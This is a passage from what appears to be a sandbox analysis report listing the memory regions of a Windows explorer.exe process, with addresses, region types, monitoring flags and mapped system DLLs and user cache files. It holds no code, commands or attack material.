"c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1659 start_va = 0x3a80000 end_va = 0x3a87fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1660 start_va = 0x3a90000 end_va = 0x3a90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 1661 start_va = 0x3aa0000 end_va = 0x3aaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1662 start_va = 0x3ab0000 end_va = 0x3ab7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 1663 start_va = 0x3ac0000 end_va = 0x3ac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ac0000" filename = "" Region: id = 1664 start_va = 0x3ae0000 end_va = 0x3b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ae0000" filename = "" Region: id = 1665 start_va = 0x3b60000 end_va = 0x3b61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b60000" filename = "" Region: id = 1666 start_va = 0x3b70000 end_va = 0x3b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b70000" filename = "" Region: id = 1667 start_va = 0x3b80000 end_va = 0x3b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b80000" filename = "" Region: id = 1668 start_va = 0x3b90000 end_va = 0x3b90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 1669 start_va = 0x3ba0000 end_va = 0x3ba1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ba0000" filename = "" Region: id = 1670 start_va = 0x3bb0000 end_va = 0x3bb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 1671 start_va = 0x3bc0000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 1672 start_va = 0x3c40000 end_va = 0x3c41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c40000" filename = "" Region: id = 1673 start_va = 0x3c50000 end_va = 0x3c51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c50000" filename = "" Region: id = 1674 start_va = 0x3c60000 end_va = 0x3c61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c60000" filename = "" Region: id = 1675 start_va = 0x3c70000 end_va = 0x3c98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 1676 start_va = 0x3ca0000 end_va = 0x3ca1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ca0000" filename = "" Region: id = 1677 start_va = 0x3cd0000 end_va = 0x3d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cd0000" filename = "" Region: id = 1678 start_va = 0x3d50000 end_va = 0x3f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 1679 start_va = 0x3f50000 end_va = 0x404ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 1680 start_va = 0x4050000 end_va = 0x4067fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 1681 start_va = 0x40b0000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 1682 start_va = 0x4130000 end_va = 0x417ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 1683 start_va = 0x41b0000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041b0000" filename = "" Region: id = 1684 start_va = 0x4230000 end_va = 0x42affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004230000" filename = "" Region: id = 1685 start_va = 0x4310000 end_va = 0x438ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004310000" filename = "" Region: id = 1686 start_va = 0x4390000 end_va = 0x56e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1687 start_va = 0x56f0000 end_va = 0x5af2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056f0000" filename = "" Region: id = 1688 start_va = 0x5b20000 end_va = 0x5b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b20000" filename = "" Region: id = 1689 start_va = 0x5bc0000 end_va = 0x5c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005bc0000" filename = "" Region: id = 1690 start_va = 0x5c70000 end_va = 0x5ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c70000" filename = "" Region: id = 1691 start_va = 0x5d60000 end_va = 0x5ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d60000" filename = "" Region: id = 1692 start_va = 0x5df0000 end_va = 0x5e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005df0000" filename = "" Region: id = 1693 start_va = 0x5f10000 end_va = 0x5f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f10000" filename = "" Region: id = 1694 start_va = 0x5fa0000 end_va = 0x601ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fa0000" filename = "" Region: id = 1695 start_va = 0x6020000 end_va = 0x609ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006020000" filename = "" Region: id = 1696 start_va = 0x60c0000 end_va = 0x613ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060c0000" filename = "" Region: id = 1697 start_va = 0x6160000 end_va = 0x61dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006160000" filename = "" Region: id = 1698 start_va = 0x6210000 end_va = 0x621ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006210000" filename = "" Region: id = 1699 start_va = 0x6280000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 1700 start_va = 0x6310000 end_va = 0x631ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006310000" filename = "" Region: id = 1701 start_va = 0x6320000 end_va = 0x639ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006320000" filename = "" Region: id = 1702 start_va = 0x63a0000 end_va = 0x641ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063a0000" filename = "" Region: id = 1703 start_va = 0x6460000 end_va = 0x64dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006460000" filename = "" Region: id = 1704 start_va = 0x6510000 end_va = 0x651ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006510000" filename = "" Region: id = 1705 start_va = 0x6530000 end_va = 0x65affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006530000" filename = "" Region: id = 1706 start_va = 0x65e0000 end_va = 0x665ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065e0000" filename = "" Region: id = 1707 start_va = 0x6680000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006680000" filename = "" Region: id = 1708 start_va = 0x6740000 end_va = 0x67bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006740000" filename = "" Region: id = 1709 start_va = 0x6870000 end_va = 0x68effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006870000" filename = "" Region: id = 1710 start_va = 0x69c0000 end_va = 0x6abffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1711 start_va = 0x6ac0000 end_va = 0x6bbffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1712 start_va = 0x6bc0000 end_va = 0x6cbffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1713 start_va = 0x6cc0000 end_va = 0x6dbffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1714 start_va = 0x6e20000 end_va = 0x6e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e20000" filename = "" Region: id = 1715 start_va = 0x6ea0000 end_va = 0x729ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ea0000" filename = "" Region: id = 1716 start_va = 0x72a0000 end_va = 0x759ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 1717 start_va = 0x75a0000 end_va = 0x88f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1718 start_va = 0x8900000 end_va = 0x8a2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 1719 start_va = 0x8ac0000 end_va = 0x8b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ac0000" filename = "" Region: id = 1720 start_va = 0x8b40000 end_va = 0x8cb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008b40000" filename = "" Region: id = 1721 start_va = 0x74080000 end_va = 0x74085fff monitored = 0 entry_point = 0x74081010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 1722 start_va = 0x752f0000 end_va = 0x753d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 1723 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1724 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1725 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1726 start_va = 0x778b0000 end_va = 0x778b6fff monitored = 0 entry_point = 0x778b106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1727 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1728 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1729 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1730 start_va = 0xff620000 end_va = 0xff8dffff monitored = 0 entry_point = 0xff64b790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 1731 start_va = 0x7fef0be0000 end_va = 0x7fef0cb6fff monitored = 0 entry_point = 0x7fef0be1074 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 1732 start_va = 0x7fef0cc0000 end_va = 0x7fef0e13fff monitored = 0 entry_point = 0x7fef0cc7d6c region_type = mapped_file name = "msoshext.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\msoshext.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msoshext.dll") Region: id = 1733 start_va = 0x7fef0e20000 end_va = 0x7fef0e5afff monitored = 0 entry_point = 0x7fef0e21238 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 1734 start_va = 0x7fef0f10000 end_va = 0x7fef0fd5fff monitored = 0 entry_point = 0x7fef0f1f220 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 1735 start_va = 0x7fef14a0000 end_va = 0x7fef14befff monitored = 0 entry_point = 0x7fef14a57b8 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 1736 start_va = 0x7fef2ab0000 end_va = 0x7fef2bebfff monitored = 0 entry_point = 0x7fef2ab197c region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 1737 start_va = 0x7fef2bf0000 end_va = 0x7fef2c8cfff monitored = 0 entry_point = 0x7fef2c7d52c region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 1738 start_va = 0x7fef2c90000 end_va = 0x7fef2d66fff monitored = 0 entry_point = 0x7fef2c91254 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 1739 start_va = 0x7fef2d70000 end_va = 0x7fef2da0fff monitored = 0 entry_point = 0x7fef2d71b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 1740 start_va = 0x7fef2db0000 end_va = 0x7fef2e04fff monitored = 0 entry_point = 0x7fef2db26e4 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 1741 start_va = 0x7fef2e10000 end_va = 0x7fef2e8efff monitored = 0 entry_point = 0x7fef2e11070 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 1742 start_va = 0x7fef2e90000 end_va = 0x7fef2f51fff monitored = 0 entry_point = 0x7fef2eb04b4 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 1743 start_va = 0x7fef2f60000 end_va = 0x7fef318afff monitored = 0 entry_point = 0x7fef2f61f00 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 1744 start_va = 0x7fef3190000 end_va = 0x7fef31e3fff monitored = 0 entry_point = 0x7fef319104c region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1745 start_va = 0x7fef31f0000 end_va = 0x7fef3da6fff monitored = 0 entry_point = 0x7fef31f1bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1746 start_va = 0x7fef3db0000 end_va = 0x7fef3e64fff monitored = 0 entry_point = 0x7fef3dd1cd0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 1747 start_va = 0x7fef3e70000 end_va = 0x7fef3ec7fff monitored = 0 entry_point = 0x7fef3e730f0 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 1748 start_va = 0x7fef3ed0000 end_va = 0x7fef3f14fff monitored = 0 entry_point = 0x7fef3ed4190 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 1749 start_va = 0x7fef3f20000 end_va = 0x7fef3f7dfff monitored = 0 entry_point = 0x7fef3f5a7fc region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 1750 start_va = 0x7fef3f80000 end_va = 0x7fef3f9ffff monitored = 0 entry_point = 0x7fef3f81010 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1751 start_va = 0x7fef3fa0000 end_va = 0x7fef3fdefff monitored = 0 entry_point = 0x7fef3fa12c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1752 start_va = 0x7fef41f0000 end_va = 0x7fef420efff monitored = 0 entry_point = 0x7fef41f3580 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 1753 start_va = 0x7fef4210000 end_va = 0x7fef43ccfff monitored = 0 entry_point = 0x7fef4211010 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 1754 start_va = 0x7fef43d0000 end_va = 0x7fef4408fff monitored = 0 entry_point = 0x7fef43d1240 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 1755 start_va = 0x7fef4410000 end_va = 0x7fef469afff monitored = 0 entry_point = 0x7fef4416f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1756 start_va = 0x7fef46a0000 end_va = 0x7fef4713fff monitored = 0 entry_point = 0x7fef46d54c8 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 1757 start_va = 0x7fef4720000 end_va = 0x7fef4790fff monitored = 0 entry_point = 0x7fef475ecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1758 start_va = 0x7fef47a0000 end_va = 0x7fef4808fff monitored = 0 entry_point = 0x7fef47a1198 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 1759 start_va = 0x7fef4940000 end_va = 0x7fef4960fff monitored = 0 entry_point = 0x7fef49473a0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 1760 start_va = 0x7fef49a0000 end_va = 0x7fef49abfff monitored = 0 entry_point = 0x7fef49a602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1761 start_va = 0x7fef49b0000 end_va = 0x7fef4a6cfff monitored = 0 entry_point = 0x7fef49b1ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 1762 start_va = 0x7fef69e0000 end_va = 0x7fef6a53fff monitored = 0 entry_point = 0x7fef69e66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1763 start_va = 0x7fef8340000 end_va = 0x7fef8348fff monitored = 0 entry_point = 0x7fef8342f98 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 1764 start_va = 0x7fef8350000 end_va = 0x7fef8367fff monitored = 0 entry_point = 0x7fef8351060 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 1765 start_va = 0x7fef8370000 end_va = 0x7fef8379fff monitored = 0 entry_point = 0x7fef83749f0 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 1766 start_va = 0x7fef8380000 end_va = 0x7fef83cefff monitored = 0 entry_point = 0x7fef8382760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1767 start_va = 0x7fef83d0000 end_va = 0x7fef840afff monitored = 0 entry_point = 0x7fef83f7600 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 1768 start_va = 0x7fef8410000 end_va = 0x7fef844afff monitored = 0 entry_point = 0x7fef84122f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1769 start_va = 0x7fef8450000 end_va = 0x7fef85ebfff monitored = 0 entry_point = 0x7fef8451030 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 1770 start_va = 0x7fef8630000 end_va = 0x7fef86aefff monitored = 0 entry_point = 0x7fef868385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 1771 start_va = 0x7fef86b0000 end_va = 0x7fef86eafff monitored = 0 entry_point = 0x7fef86b1070 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 1772 start_va = 0x7fef86f0000 end_va = 0x7fef86fcfff monitored = 0 entry_point = 0x7fef86f7104 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1773 start_va = 0x7fef8700000 end_va = 0x7fef87b9fff monitored = 0 entry_point = 0x7fef870115c region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 1774 start_va = 0x7fef87c0000 end_va = 0x7fef883bfff monitored = 0 entry_point = 0x7fef87c11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1775 start_va = 0x7fef8840000 end_va = 0x7fef8ae2fff monitored = 0 entry_point = 0x7fef8843498 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 1776 start_va = 0x7fef8af0000 end_va = 0x7fef8afbfff monitored = 0 entry_point = 0x7fef8af1380 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 1777 start_va = 0x7fef8b00000 end_va = 0x7fef8b33fff monitored = 0 entry_point = 0x7fef8b01890 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 1778 start_va = 0x7fef8c40000 end_va = 0x7fef8d2dfff monitored = 0 entry_point = 0x7fef8c412a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1779 start_va = 0x7fef8d30000 end_va = 0x7fef8db2fff monitored = 0 entry_point = 0x7fef8d5692c region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 1780 start_va = 0x7fef8dd0000 end_va = 0x7fef8de8fff monitored = 0 entry_point = 0x7fef8de077c region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 1781 start_va = 0x7fef8df0000 end_va = 0x7fef8e32fff monitored = 0 entry_point = 0x7fef8e11b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1782 start_va = 0x7fef8e40000 end_va = 0x7fef8e49fff monitored = 0 entry_point = 0x7fef8e44938 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 1783 start_va = 0x7fef8e50000 end_va = 0x7fef8e6bfff monitored = 0 entry_point = 0x7fef8e51198 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 1784 start_va = 0x7fef8e70000 end_va = 0x7fef8e91fff monitored = 0 entry_point = 0x7fef8e71198 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 1785 start_va = 0x7fef8ea0000 end_va = 0x7fef8ea9fff monitored = 0 entry_point = 0x7fef8ea1198 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 1786 start_va = 0x7fef8eb0000 end_va = 0x7fef8fcefff monitored = 0 entry_point = 0x7fef8ec339c region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 1787 start_va = 0x7fef8fd0000 end_va = 0x7fef8ff7fff monitored = 0 entry_point = 0x7fef8fe3cc4 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 1788 start_va = 0x7fef9070000 end_va = 0x7fef9082fff monitored = 0 entry_point = 0x7fef907a8b8 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 1789 start_va = 0x7fef90b0000 end_va = 0x7fef90b7fff monitored = 0 entry_point = 0x7fef90b1030 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 1790 start_va = 0x7fef90c0000 end_va = 0x7fef913ffff monitored = 0 entry_point = 0x7fef90c4a8c region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 1791 start_va = 0x7fef9140000 end_va = 0x7fef914efff monitored = 0 entry_point = 0x7fef9141040 region_type = 